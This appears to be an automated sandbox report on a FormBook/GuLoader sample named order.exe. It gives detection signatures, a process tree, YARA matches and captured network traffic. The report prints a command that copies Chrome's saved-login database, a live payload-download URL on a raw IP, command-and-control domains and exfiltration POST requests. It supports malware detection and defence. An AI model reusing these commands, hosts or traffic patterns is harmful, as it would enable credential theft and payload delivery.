Loading ...

Play interactive tourEdit tour

Analysis Report order.exe.vir

Overview

General Information

Sample Name:order.exe.vir (renamed file extension from vir to exe)
MD5:6ffa25db7a99e5438888579603d1d91f
SHA1:3e15363d240a923eaa11165b31e9b4d879407f12
SHA256:72eb2dc730e3574dcb204d37fcfb35cf91bacd8087d6028d743cb0992c874244

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • order.exe.exe (PID: 4028 cmdline: 'C:\Users\user\Desktop\order.exe.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
    • order.exe.exe (PID: 5376 cmdline: 'C:\Users\user\Desktop\order.exe.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • control.exe (PID: 5904 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Users\user\Desktop\order.exe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4944 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • olotql9xtrtpnd.exe (PID: 5528 cmdline: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe MD5: 6FFA25DB7A99E5438888579603D1D91F)
          • olotql9xtrtpnd.exe (PID: 4972 cmdline: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe MD5: 6FFA25DB7A99E5438888579603D1D91F)
        • olotql9xtrtpnd.exe (PID: 5944 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
          • olotql9xtrtpnd.exe (PID: 2432 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
        • olotql9xtrtpnd.exe (PID: 3856 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
          • olotql9xtrtpnd.exe (PID: 3780 cmdline: 'C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exe' MD5: 6FFA25DB7A99E5438888579603D1D91F)
        • help.exe (PID: 5712 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • help.exe (PID: 4000 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18429:$sqlite3step: 68 34 1C 7B E1
      • 0x1853c:$sqlite3step: 68 34 1C 7B E1
      • 0x18458:$sqlite3text: 68 38 2A 90 C5
      • 0x1857d:$sqlite3text: 68 38 2A 90 C5
      • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 51 entries

      Sigma Overview


      System Summary:

      barindex
      Sigma detected: Steal Google chrome login dataShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\control.exe, ParentImage: C:\Windows\SysWOW64\control.exe, ParentProcessId: 5904, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 4944

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://149.255.36.133/bin_PqLAqQjAza233.binAvira URL Cloud: Label: malware
      Source: http://149.255.36.133/bin_PqLAqQjAza233.bin/Avira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://149.255.36.133/bin_PqLAqQjAza233.binVirustotal: Detection: 15%Perma Link
      Source: http://149.255.36.133/bin_PqLAqQjAza233.bin/Virustotal: Detection: 11%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Gmd1\olotql9xtrtpnd.exeVirustotal: Detection: 61%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\Gmd1\olotql9xtrtpnd.exeReversingLabs: Detection: 63%
      Multi AV Scanner detection for submitted fileShow sources
      Source: order.exe.exeVirustotal: Detection: 61%Perma Link
      Source: order.exe.exeReversingLabs: Detection: 63%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000015.00000002.1592683082.000000001F080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000002.1614780220.0000000000110000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000002.1583585086.0000000000590000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1611465556.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2471801241.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.1586527036.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.914633096.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2472989591.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1590005751.000000001F080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000018.00000002.1590663270.0000000002D80000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2471201439.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1581333071.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.1615263059.000000001F0A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.919876173.000000001EF20000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\Gmd1\olotql9xtrtpnd.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: order.exe.exeJoe Sandbox ML: detected

      Source: C:\Users\user\Desktop\order.exe.exeCode function: 5x nop then xor edi, edi0_2_021824DD
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 5x nop then xor edi, edi1_2_005624DD
      Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx8_2_00567AC6
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 5x nop then xor edi, edi17_2_020D24DD
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 5x nop then xor edi, edi18_2_020524DD
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 5x nop then xor edi, edi19_2_006E24DD
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 5x nop then xor edi, edi20_2_005624DD
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 5x nop then xor edi, edi21_2_005624DD

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49733 -> 149.255.36.133:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49739 -> 149.255.36.133:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49740 -> 149.255.36.133:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49741 -> 149.255.36.133:80
      Tries to resolve many domain names, but no domain seems validShow sources
      Source: unknownDNS traffic detected: query: www.yfur.ltd replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.makeanexposure.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.phuquochomeland.com replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: www.trinetraclan.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.brifarroo.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.my-wifeandi.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.contactsweeper.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.antigennewburg.tech replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.fellowshipgreer.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.6882ss.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.digapony1427238.biz replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.uzmanserviscepte.net replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.shaueen.com replaycode: Name error (3)
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1Host: www.topemailleads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=H51V9duMqRnbj95D1MvvJ7i7VbIcWL9pj3QvEMEhOvjHnOj6szug+8ev4DeAite72oGg&Lv=EN9tiz_Hl HTTP/1.1Host: www.writusp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=r/0BE7VwGcmVNDbls0v6gsZ9vdmzPgP8APQlxcRpFAvW8Fym0NKLGN6V/aQwsh4AIT2y&Lv=EN9tiz_Hl HTTP/1.1Host: www.hbyidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /j4h/?M6Advpq=7t4HToMigGNwJPMQvt254oF1CV/eJdQMsFShHVoBivPn5D5h8CbCS8esBGhfsVKMtt2q&Lv=EN9tiz_Hl HTTP/1.1Host: www.topemailleads.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_PqLAqQjAza233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 149.255.36.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.writusp.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.writusp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.writusp.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 50 62 35 76 6a 37 66 36 71 58 4b 52 78 61 73 77 36 4a 61 43 4a 76 61 7a 53 35 31 4e 61 4c 5a 75 36 54 4e 39 51 38 77 42 4f 65 7a 37 32 71 72 79 75 68 76 57 39 4c 7a 4c 6b 44 58 34 36 59 36 71 33 36 58 53 42 48 51 45 68 68 56 5f 4d 50 48 30 4f 6c 52 53 35 49 33 4d 69 73 43 66 47 42 48 70 43 45 74 67 49 56 30 76 66 6b 64 71 6a 6b 32 6b 77 79 6c 66 73 44 67 6f 76 39 36 33 72 42 67 77 61 51 6c 44 69 4d 59 52 6d 59 49 61 4b 44 30 6c 4f 64 79 52 58 65 6e 5a 49 48 6a 69 4b 74 4c 53 34 74 4e 63 39 4f 73 76 31 65 5a 75 7e 67 6e 52 30 6c 65 66 61 61 79 59 34 2d 57 70 42 39 63 66 35 33 75 47 74 37 55 66 50 59 65 4f 52 65 47 72 5a 52 28 56 42 77 47 51 7e 7a 7e 61 55 53 45 36 37 74 62 43 6d 75 4b 57 30 49 4d 5f 56 45 74 52 6b 2d 7a 53 4b 63 63 77 35 53 59 77 35 37 74 64 55 31 78 74 67 70 53 2d 70 6d 54 52 38 6c 70 61 48 78 43 41 67 7a 6b 32 64 46 58 73 47 31 4d 58 6c 68 69 43 4b 4d 6d 59 52 54 4f 33 79 73 76 76 7a 73 47 68 33 43 44 36 43 63 7e 41 4e 30 30 58 59 58 71 5f 4e 30 61 5a 61 67 74 76 66 53 39 42 46 6c 58 4c 45 34 63 74 30 66 77 35 6e 7a 76 69 49 45 71 37 67 72 34 6d 55 43 58 76 65 4c 4b 56 5a 44 57 4b 53 30 48 79 73 53 79 45 4c 6d 77 6b 31 53 49 6b 30 59 35 68 37 75 32 5f 71 78 6e 4c 42 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: M6Advpq=Pb5vj7f6qXKRxasw6JaCJvazS51NaLZu6TN9Q8wBOez72qryuhvW9LzLkDX46Y6q36XSBHQEhhV_MPH0OlRS5I3MisCfGBHpCEtgIV0vfkdqjk2kwylfsDgov963rBgwaQlDiMYRmYIaKD0lOdyRXenZIHjiKtLS4tNc9Osv1eZu~gnR0lefaayY4-WpB9cf53uGt7UfPYeOReGrZR(VBwGQ~z~aUSE67tbCmuKW0IM_VEtRk-zSKccw5SYw57tdU1xtgpS-pmTR8lpaHxCAgzk2dFXsG1MXlhiCKMmYRTO3ysvvzsGh3CD6Cc~AN00XYXq_N0aZagtvfS9BFlXLE4ct0fw5nzviIEq7gr4mUCXveLKVZDWKS0HysSyELmwk1SIk0Y5h7u2_qxnLBQ).
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.writusp.comConnection: closeContent-Length: 155857Cache-Control: no-cacheOrigin: http://www.writusp.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.writusp.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 50 62 35 76 6a 36 6d 42 6f 48 50 4b 67 66 78 4e 34 36 32 76 64 4f 6a 56 43 5a 68 4a 64 6f 6c 41 6d 52 4a 54 51 38 67 46 46 37 44 54 67 36 37 79 73 6a 58 52 35 72 7a 55 69 44 58 5f 72 49 28 54 72 64 72 61 42 47 6c 6a 68 68 64 77 43 65 33 31 4f 56 52 4a 36 6f 79 31 67 73 58 44 47 43 79 4c 43 6d 68 34 4e 56 34 76 41 6b 56 53 36 6c 6d 6a 35 54 70 51 77 6e 49 74 74 38 54 6e 72 52 4d 59 56 57 73 7a 72 75 73 54 30 35 73 76 45 69 46 79 4b 4f 53 65 5a 76 43 54 52 45 66 78 55 38 58 57 28 73 4d 6a 6a 66 73 73 71 36 31 73 72 51 58 7a 34 30 61 6d 64 61 6a 5f 34 39 32 66 47 50 35 62 39 30 61 4f 76 49 42 77 62 61 79 4d 4e 66 47 6a 64 54 6e 6e 44 77 32 76 38 33 75 52 46 78 41 4b 38 6f 66 6f 72 72 6d 48 6b 70 77 6a 4e 46 78 74 67 74 66 4b 56 76 45 50 78 31 6c 77 69 34 31 56 58 77 70 4c 6c 4a 53 64 76 6d 54 56 7a 45 59 76 43 55 37 4d 67 67 73 55 5a 46 76 35 43 6b 67 55 70 44 57 65 45 4d 65 5a 53 69 57 37 71 73 50 62 69 2d 71 75 78 6c 72 5a 4b 38 28 65 44 57 63 69 59 58 71 37 4e 77 4f 5f 61 55 6c 76 65 41 30 61 44 43 43 45 47 34 63 4b 32 50 41 37 73 6b 76 79 49 43 43 37 75 2d 38 41 56 78 48 76 61 5a 69 53 59 69 57 4b 54 6b 48 79 33 69 7a 75 48 31 45 76 33 33 73 43 30 71 39 67 30 61 4c 4e 71 31 79 6e 66 69 6e 39 55 62 57 35 6b 53 6b 30 57 4d 70 51 4b 6f 4a 57 35 38 46 32 62 70 76 41 66 54 77 46 6f 56 45 5a 4e 4f 56 68 43 49 33 39 75 44 65 69 6a 2d 63 62 46 46 64 39 31 72 45 34 68 53 4b 75 33 45 32 77 70 58 70 5f 48 42 53 56 4c 70 39 70 6f 77 52 44 44 2d 39 4c 77 71 44 36 69 4e 79 47 39 50 79 50 4e 75 73 68 68 52 4e 34 43 6a 49 70 74 68 52 51 5a 4c 6b 61 76 45 49 70 43 5a 59 42 61 4e 42 54 45 56 77 6d 70 69 66 55 41 70 42 2d 6a 76 34 38 4e 72 73 31 6c 34 34 66 7a 35 44 6e 45 51 32 78 75 35 6c 55 46 44 62 67 45 34 33 67 30 62 50 77 62 4d 46 74 47 51 59 77 76 6d 64 69 50 37 69 76 78 4e 73 38 77 42 37 61 55 7a 4d 77 4f 6a 6f 44 4a 69 4b 48 32 62 6f 77 59 44 67 6f 43 34 54 5a 57 33 51 70 67 4c 69 54 67 6a 62 72 63 4b 51 37 61 79 34 34 36 4a 66 63 74 41 55 41 30 7a 47 5a 28 79 36 37 32 36 46 46 51 31 56 64 52 44 51 43 75 2d 28 58 77 38 37 66 30 7a 46 77 72 5a 6a 51 41 35 43 65 39 6b 4e 72 7a 35 70 58 43 73 67 6f 49 51 41 65 67 50 51 63 56 55 43 68 7a 6e 78 64 5a 31 64 55 37 45 6d 50 48 6d 51 4b 30 59 65 4e 7e 37 37 35 64 57 33 41 77 30 34 70 36 34 6a 36 6b 37 4d 50 76 5a 44 73 65 34 68 55 38 68 6b 72 4f 4d 37 4d 42 47 49 70 46 72 71 76 41 5a 36 45 47 6b 6f 44 31 5f 33 5a 35 44 66 73 63 44 48 67 79 62 56 78 31 6c 34 33 66 51 75 71 65 32 4b 63 36 74 32 48 46 69 6e 72 31 47 48 44 59 2d 7e 4d 71 44 53 53 59 59 66 62 58 6a 77 4d 35 4e 67 57 6b 36 66 6c 64 6e 50 4
      Source: global trafficHTTP traffic detected: POST /j4h/ HTTP/1.1Host: www.hbyidong.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.hbyidong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hbyidong.com/j4h/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 36 41 64 76 70 71 3d 6a 64 34 37 61 62 6f 45 47 4c 62 36 51 6a 66 76 6b 77 6d 51 68 62 68 6f 68 39 71 77 47 51 71 37 55 5f 46 79 6c 4c 68 4c 42 53 6a 78 30 6d 6d 66 38 6f 28 39 56 74 33 48 70 4c 35 42 73 30 4d 4f 64 42 44 70 33 4f 66 44 46 4c 49 6c 6f 41 70 59 45 56 50 56 44 6b 6d 46 65 42 4d 46 69 34 56 34 5a 6b 43 59 74 39 31 70 6d 64 64 68 74 56 65 4c 4b 51 73 79 56 35 63 41 4f 64 43 41 75 44 4e 6a 62 62 68 68 68 58 58 38 44 64 57 57 46 33 66 54 61 32 52 6d 46 4a 57 47 4e 6e 61 6e 69 5a 73 67 57 41 54 4a 54 44 7e 4d 41 6e 4b 71 51 51 4d 44 47 76 31 38 6a 43 6c 4d 39 73 56 46 79 49 31 71 64 73 63 43 30 63 6f 54 78 4e 6a 63 48 41 78 63 75 6d 31 39 4f 77 6d 4e 58 58 43 38 50 57 44 32 46 4a 53 30 79 74 47 4d 35 50 55 59 70 2d 43 37 37 41 70 70 56 71 68 4f 4f 2d 67 37 4a 34 4d 70 48 71 69 42 58 4d 62 76 44 58 6c 7a 5a 58 67 39 4d 49 34 31 76 75 36 69 79 79 32 36 4a 53 62 42 39 73 63 68 33 6a 45 58 6b 66 68 33 36 53 55 72 75 53 77 59 68 7a 73 61 35 63 6b 37 61 7a 7a 41 6e 67 45 76 33 4b 70 45 4b 5a 32 72 62 4d 31 4e 47 32 56 5a 33 34 37 32 7a 42 78 4b 6b 51 54 4e 74 32 32 6b 57 61 54 57 7a 67 34 68 5a 64 55 74 7e 75 69 6e 68 2d 74 79 34 48 4e 4b 47 38 43 44 73 71 63 69 5a 36 6d 5f 33 41 7e 47 62 4b 69 32 53 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: M6Advpq=jd47aboEGLb6QjfvkwmQhbhoh9qwGQq7U_FylLhLBSjx0mmf8o(9Vt3HpL5Bs0MOdBDp3OfDFLIloApYEVPVDkmFeBMFi4V4ZkCYt91pmddhtVeLKQsyV5cAOdCAuDNjbbhhhXX8DdWWF3fTa2RmFJWGNnaniZsgWATJTD~MAnKqQQMDGv18jClM9sVFyI1qdscC0coTxNjcHAxcum19OwmNXXC8PWD2FJS0ytGM5PUYp-C77AppVqhOO-g7J4MpHqiBXMbvDXlzZXg9MI41vu6iyy26JSbB9sch3jEXkfh36SUruSwYhzsa5ck7azzAngEv3KpEKZ2rbM1NG2VZ3472zBxKkQTNt22kWaTWzg4hZdUt~uinh-ty4HNKG8CDsqciZ6m_3A~GbKi2SQ).
